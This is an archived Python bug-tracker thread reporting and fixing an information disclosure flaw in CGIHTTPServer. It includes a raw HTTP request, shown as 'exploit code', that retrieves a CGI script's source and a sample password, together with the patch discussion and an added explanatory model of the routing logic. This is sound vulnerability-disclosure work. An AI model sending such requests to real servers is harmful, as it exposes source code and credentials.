[issue2254] Python CGIHTTPServer information disclosure
Changes by Gregory P. Smith g...@krypto.org:

Removed file: http://bugs.python.org/file9628/CGIHTTPServer_is_cgi_fix.diff

___
Python tracker rep...@bugs.python.org
http://bugs.python.org/issue2254
___
___
Python-bugs-list mailing list
Unsubscribe: http://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue2254] Python CGIHTTPServer information disclosure
Gregory P. Smith g...@krypto.org added the comment:

Fixed in trunk r71303.

This potentially changes the behavior of CGIHTTPServer (for the better) so this is probably not appropriate to backport to a release branch unless someone really considers the security of this to be severe. If backported, the new module function should be expanded inline to avoid adding a new (though undocumented) API.

Closing.

--
resolution:  -> fixed
status: open -> closed
versions: +Python 2.6, Python 3.0
[issue2254] Python CGIHTTPServer information disclosure
Gregory P. Smith g...@krypto.org added the comment:

FYI - Your patch does not work on Windows as it uses os.path for URI manipulation. That means it behaves differently with regards to / and \ based on platform. I'm making a new one. I've written a unittest. Should be fixed soon.
[issue2254] Python CGIHTTPServer information disclosure
Gregory P. Smith [EMAIL PROTECTED] added the comment:

Could you please create a test case for this as a patch to Lib/test/test_httpservers.py? Thanks!

--
assignee:  -> gregory.p.smith
nosy: +gregory.p.smith
priority:  -> normal
[issue2254] Python CGIHTTPServer information disclosure
New submission from sumar:

Summary:
An information disclosure flaw exists in the standard Python CGIHTTPServer module. Bug is confirmed in Python 2.5 @ Fedora 7 (python-2.5-15.fc7).

Description:
Requesting a CGI script (in the example, test.py) without / at the beginning of the URL causes the script content/code to be returned instead of the script being executed. It could lead to disclosure of secret information, e.g. a password.

Exploit code:

    Connected to localhost.
    Escape character is '^]'.
    GET cgi-bin/test.py HTTP/1.0

    HTTP/1.0 200 OK
    Server: SimpleHTTP/0.6 Python/2.5
    Date: Fri, 07 Mar 2008 14:55:30 GMT
    Content-type: text/plain
    Content-Length: 150
    Last-Modified: Fri, 07 Mar 2008 14:55:04 GMT

    #!/usr/bin/env python
    print 'Content-Type: text/html'
    print 'Cache-Control: no-cache'
    print
    print 'Hello'
    passwd='secret'
    path=/opt/myapp/secretpath
    Connection closed by foreign host.

Correct request:

    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.
    GET /cgi-bin/test.py HTTP/1.0

    HTTP/1.0 200 Script output follows
    Server: SimpleHTTP/0.6 Python/2.5
    Date: Fri, 07 Mar 2008 15:01:03 GMT
    Content-Type: text/html
    Cache-Control: no-cache

    Hello
    Connection closed by foreign host.

--
components: Library (Lib)
messages: 63361
nosy: m.sucajtys
severity: normal
status: open
title: Python CGIHTTPServer information disclosure
type: security
versions: Python 2.5
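Added example, not part of the original thread and not CPython's own code: a simplified model of the routing decision behind the report above, and of the os.path portability point raised in the "does not work on Windows" comment. CGI_DIRECTORIES, the function names and the reduced translate_path are assumptions made for illustration.

```python
import ntpath
import posixpath
from urllib.parse import unquote

CGI_DIRECTORIES = ["/cgi-bin"]  # assumed configuration, taken from the report's URL


def is_cgi_prefix(path):
    """Raw prefix test on the request path, with no normalization."""
    return any(path == d or path.startswith(d + "/") for d in CGI_DIRECTORIES)


def translate_path(path):
    """Static-file mapping (simplified model): empty segments are dropped,
    so a missing leading '/' makes no difference to which file is read."""
    parts = unquote(path.split("?", 1)[0]).split("/")
    return "/".join(p for p in parts if p and p not in (".", ".."))


def is_cgi_normalized(path, pathmod=posixpath):
    """Normalize the URL path first, then apply the same prefix test.
    pathmod stands in for os.path: posixpath on Unix, ntpath on Windows."""
    clean = unquote(path.split("?", 1)[0]).lstrip("/")
    return is_cgi_prefix(pathmod.normpath("/" + clean))


def is_cgi_windows_ospath(path):
    """The same normalization as it would behave if os.path were ntpath."""
    return is_cgi_normalized(path, ntpath)


def route(path, is_cgi):
    """What a server built from these two pieces does with a request."""
    if is_cgi(path):
        return "execute"
    return "serve file: " + translate_path(path)


if __name__ == "__main__":
    for req in ("/cgi-bin/test.py", "cgi-bin/test.py"):
        print(req, "| prefix:", route(req, is_cgi_prefix),
              "| normalized:", route(req, is_cgi_normalized))
    # URL paths always use '/'; ntpath rewrites it to '\\', so the prefix
    # test no longer matches even for the well-formed request.
    print("ntpath:", route("/cgi-bin/test.py", is_cgi_windows_ospath))
```

The two checks disagree only on the request without the leading slash, which is the case where the static handler and the CGI check see different paths.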
[issue2254] Python CGIHTTPServer information disclosure
Guilherme Polo added the comment:

I'm attaching a patch that fixes this; it was done for rev 61179 (trunk).

Note that the is_cgi method is incorrectly documented, even more so now. Only the first line in its docstring is correct now; before this patch, the last paragraph was correct too.

--
keywords: +patch
nosy: +gpolo
Added file: http://bugs.python.org/file9628/CGIHTTPServer_is_cgi_fix.diff
[issue2254] Python CGIHTTPServer information disclosure
Guilherme Polo added the comment:

Oops, I was doing some tests in the last patch and left a bug in it. I'm attaching a new one.

Added file: http://bugs.python.org/file9629/CGIHTTPServer_is_cgi_fix2.diff
[issue2254] Python CGIHTTPServer information disclosure
Guilherme Polo added the comment:

This corrects the is_cgi docstring (maybe this should be done in a new issue?). It also removes a part of it that I believe to not be necessary; someone correct me if I'm wrong.

Added file: http://bugs.python.org/file9632/CGIHTTPServer_is_cgi_doc_fix.diff